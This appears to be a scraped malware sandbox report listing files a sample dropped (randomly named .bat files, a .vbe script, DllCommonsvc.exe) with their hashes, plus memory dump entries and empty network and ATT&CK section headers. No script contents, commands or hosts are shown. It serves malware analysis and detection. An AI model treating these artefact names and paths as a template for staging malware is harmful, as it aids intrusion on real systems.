SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d42b6da621e8df5674e26b799c8e2aa

SHA1
ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

SHA256
5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

SHA512
53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
119B

MD5
fad926bf02f67fd6caf78778d3e43e37

SHA1
80b41a99ca8d4cbe336c04ae1dc7493ca750aabf

SHA256
2f71445e093de0ee1d7e78c6aa4aa8ee34288d0959c1ffd1e0b7dff8edbc9e56

SHA512
9adc9de17cd3b5197cbd65147a52d85b278364b5eaf7f302a9fff31390b89218ba328c2a424a6cf30c84fed1e03671e069d97b5317ee0993c6ad0056f3896be1

Download Submit
C:\Users\Admin\AppData\Local\Temp\6Po3x2tXZG.bat

Filesize
205B

MD5
2b5f0a11f5edd9a0e6ce856ba63ec6bb

SHA1
40364a17a22713f61066a418516ab845c30d59ad

SHA256
25c77ba2553bf00b3cf4729bfaa4aad8c3d228c7a7452958f376064ae7f2e28d

SHA512
fd929a3d0ce852cc0ac2c977775038d4a6711b03370e5356170a4ae9956d5b4b748f0cda64a3c29ec710f1db885a9dfb7457ae40d24ad723f8f579f8f210b8cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\8UyA8TRco5.bat

Filesize
205B

MD5
4de336c0d7fe9e4b9e2a864ba37e3774

SHA1
377b76033aada950ab7ad19c6635b3d7be2b53dd

SHA256
70f8e4b6a6b1540e447babd53354b7d5752c05249e0ce89bf800b154a598640c

SHA512
27fa8e4f82f403a56b69662789b026e3966b66cbb2e73bd6356324dc7c4959dc6c250efe049438cb53a4e63f1d7f013dd520977b7b4fea98996a1f67c1ef780f

Download Submit
C:\Users\Admin\AppData\Local\Temp\BHs9KC1JDp.bat

Filesize
205B

MD5
ea08afaffbf02b67d06529c715399d30

SHA1
cc936e9068f4aa69018a00ba920c4be95eac2d69

SHA256
dd09ff642109114ad40335af03725b67d2b0ab06c77c1d8211d163da2d188df9

SHA512
607d7a4471c33c657b4a6036d81fbfede978f67d03cee17a72f347dfdaf73c943f7a79575a224f2372b14445256cbf577ade709674e3ea8eccbf29f2d4934076

Download Submit
C:\Users\Admin\AppData\Local\Temp\SzaURWjxsM.bat

Filesize
205B

MD5
4e3117475d59e73fe2ce6dde9c12a321

SHA1
58404357ca96b2fe8021f5e54d5da8858377c0cf

SHA256
6a723e968f2afedfafa189e5344e96139e7c60e15e15f63aa4dbb092f28cb364

SHA512
6bcc12ae5b626f585732885689a95430fc1945e54d1bca37fac2f3b6b351e72e7ba3f2950648673be136090ced77cb87dd0460a677f22bdd02a943e029417dd7

Download Submit
C:\Users\Admin\AppData\Local\Temp\TA6UjH3MJQ.bat

Filesize
205B

MD5
9a04c44e1bcc580c622a18361c2b3418

SHA1
d723c9ae73fd566ff968f973956e9334a2876cfc

SHA256
453cb199508742b825d176619a22564c75273f3fed723df376cb86b6071d2e3e

SHA512
bd1d77953a9f57841bfe128247c9ba0e3bfc2b191092ab55e4bcc7cd1d52fa11ef15adc2da4bebb3466c904a3654c12449990e227202850ca85a72ccd9e04fd1

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5pdga2gk.yxi.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ctDgUbHuaY.bat

Filesize
205B

MD5
562c8905a641ae8dcf849d631dca8c81

SHA1
5a108f90697cd766739b218f5688d5e6b01dbfcc

SHA256
6e9bc302a38ab45ce241888aef5bceab16246e38888f1ceef35f0685b5f3c0d4

SHA512
314724ad2862b3d22fe703667d210517eea57b34c9192b8fcce5eb02c8a3dbe50546bf2686eabe0e568eb3d5aa70717e4ecd39bc4443dca572690c5f9b266f33

Download Submit
C:\Users\Admin\AppData\Local\Temp\ljgkLFIn4v.bat

Filesize
205B

MD5
f5df0bad936959f0e60b87303115cf2f

SHA1
4b7e43a22294eb41e21df36884b85c186c643ac0

SHA256
2e65e09c317362363ed789740831110ec5e344cd1261a1c474ca420194e85c89

SHA512
259f44eb05dc67b97800125dcf109a5fe279a07aeb2c97ad953dd4f5a8dcc2d24fc988b65b54ff602f3075c0dc75765a2103279687e21c987355772a077d6cae

Download Submit
C:\Users\Admin\AppData\Local\Temp\rfuxuqwfwI.bat

Filesize
205B

MD5
6db0462d2224fb62bd38b73e5abd0880

SHA1
44871b4dd7e57a90469475abbe0544f1e7211e0d

SHA256
25c5b15b87a4578b6c0eca7bb4bcde2b2ba462c0ccedd0f2fa12d00204f0c110

SHA512
5ef6ab06d34333386f2b7945e3ff8de2a5dd6ff2d848b76bab51bce8034ec8a33d1743a1c2d0322971e7cb98108ab15c0c75fe67b6db337a2b288255de7efc99

Download Submit
C:\Users\Admin\AppData\Local\Temp\uSow6ZWML2.bat

Filesize
205B

MD5
257dac3d890a91256cdc6160472e3f95

SHA1
a0f29b85e794057e8ebf50834e9fbf7ad53e6126

SHA256
ee7fea31bb316c8e71824f0462d9774a907bb3bd9939af11d41a097e505b57e3

SHA512
6802e4bc9ee063b436756914b138690c6abab70548c2b3906396becc2e1584857b1eb92588616eceef7848ef8a198a23dc1adc4e78b8844f25599f5285d22f8d

Download Submit
C:\Users\Admin\AppData\Local\Temp\wOqzmeZFfo.bat

Filesize
205B

MD5
61bb84d2d0a8c9c833846da56cc50ce6

SHA1
8f63879d171b41b262ab93aab68c5d22884b51e2

SHA256
1bef605faa71c32815ad06ac016bd838d633862a6f9f6f6ec762693c599d4dd8

SHA512
e2ae2a79acc9d129059c5a0cb71b3b5628fdc1dd56ec3072ecc23061f7920d03b7ad94017ac12d36c33913b0ce19535c10cf850d4ab85de450c6c895e0493848

Download Submit
C:\Users\Admin\AppData\Local\Temp\wUBsuxMZs4.bat

Filesize
205B

MD5
5f1719200284678ac748af612a82a85d

SHA1
0679d12a48fde8f61ff3bdc583ebca7c09a98a63

SHA256
d0323d12ef9cbfcc2cfc1f94203111eb26024be8d1b2b69cda3f874bba0959d1

SHA512
b20ea404230e20a53980c9e66267fff597978e0d26b48f00f164a911463195e0655e894cd241ed55b3637b0ea1cc85b1a9d2ce519c97a219dec81e6174a74fed

Download Submit
C:\Users\Admin\AppData\Local\Temp\xZLz5Ote6t.bat

Filesize
205B

MD5
859101ab45bbabb5f5534e2dadf1dab8

SHA1
84b41326729b328fb0ee0701e943d146c44de53a

SHA256
9944cd416aef891c1ee284c6c167d616e98ca4ae5169c17b71e5ec0f5995111f

SHA512
544fd78ab652aa0f6c9eb47a15dd9cacc050fbdf485bab91bbcce88351f06a8465e4a1d6fc5154623a407b65b9d07a1a1047a3aa344c73a5f78e298159351452

Download Submit
C:\Users\Admin\AppData\Local\Temp\yQDva2PSBr.bat

Filesize
205B

MD5
8861f21ae3814b82b71c30bf8eaf8bcf

SHA1
c11905b0b693fff825fbca1b22643b1d3ad43a41

SHA256
797b493b669ff11c541fc022e2c40708aed9886d17cf60881a5f4bd75f7ab4f3

SHA512
60810fb29ad8777c2b504188188a1749e25cbab32e288ca75ecc7be31523fa855090c1fff630c2250387cb61f018e262b42f9764903b077eb5efc7395e257bc9

Download Submit
C:\providercommon\1zu9dW.bat

Filesize
36B

MD5
6783c3ee07c7d151ceac57f1f9c8bed7

SHA1
17468f98f95bf504cc1f83c49e49a78526b3ea03

SHA256
8ab782f0f327a2021530e7230d3aee8abbecb7eed59482a3a46e78b9e3862322

SHA512
c6012d4bfac1ed14d0fd9f0eabd0e1c3d647b343db292a907b246271d52a4b7469c809db43910ddba2e8c5045f9cb3d24d0af62d363281e6cb8b39ee94a183e8

Download Submit
C:\providercommon\DllCommonsvc.exe

Filesize
1.0MB

MD5
bd31e94b4143c4ce49c17d3af46bcad0

SHA1
f8c51ff3ff909531d9469d4ba1bbabae101853ff

SHA256
b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

SHA512
f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

Download Submit
C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe

Filesize
197B

MD5
8088241160261560a02c84025d107592

SHA1
083121f7027557570994c9fc211df61730455bb5

SHA256
2072cc9a4a3b84d4c5178ab41c5588eea7d0103e3928e34d64f17bf97f3d1cc1

SHA512
20d9369dd359315848ea30144383a0bb479d86059fdbc3b3256ac84f998193512feb3b1799ab663619920c99fe7e0ebba33ada31a3855094b956fcd351c90478

Download Submit
memory/1336-129-0x0000000003110000-0x0000000003122000-memory.dmp

Filesize
72KB

Download
memory/1484-161-0x0000000000990000-0x00000000009A2000-memory.dmp

Filesize
72KB

Download
memory/1520-74-0x0000000000EF0000-0x0000000000F02000-memory.dmp

Filesize
72KB

Download
memory/2740-37-0x00000258A6590000-0x00000258A65B2000-memory.dmp

Filesize
136KB

Download
memory/3272-115-0x0000000000AA0000-0x0000000000AB2000-memory.dmp

Filesize
72KB

Download
memory/3436-148-0x0000000002FE0000-0x0000000002FF2000-memory.dmp

Filesize
72KB

Download
memory/4276-122-0x0000000001100000-0x0000000001112000-memory.dmp

Filesize
72KB

Download
memory/4456-168-0x000000001AEC0000-0x000000001AED2000-memory.dmp

Filesize
72KB

Download
memory/4560-181-0x0000000002A50000-0x0000000002A62000-memory.dmp

Filesize
72KB

Download
memory/4856-16-0x000000001AD30000-0x000000001AD3C000-memory.dmp

Filesize
48KB

Download
memory/4856-15-0x000000001AD20000-0x000000001AD2C000-memory.dmp

Filesize
48KB

Download
memory/4856-14-0x0000000002390000-0x00000000023A2000-memory.dmp

Filesize
72KB

Download
memory/4856-13-0x0000000000100000-0x0000000000210000-memory.dmp

Filesize
1.1MB

Download
memory/4856-17-0x000000001AD40000-0x000000001AD4C000-memory.dmp

Filesize
48KB

Download
memory/4856-12-0x00007FFDBCAD3000-0x00007FFDBCAD5000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.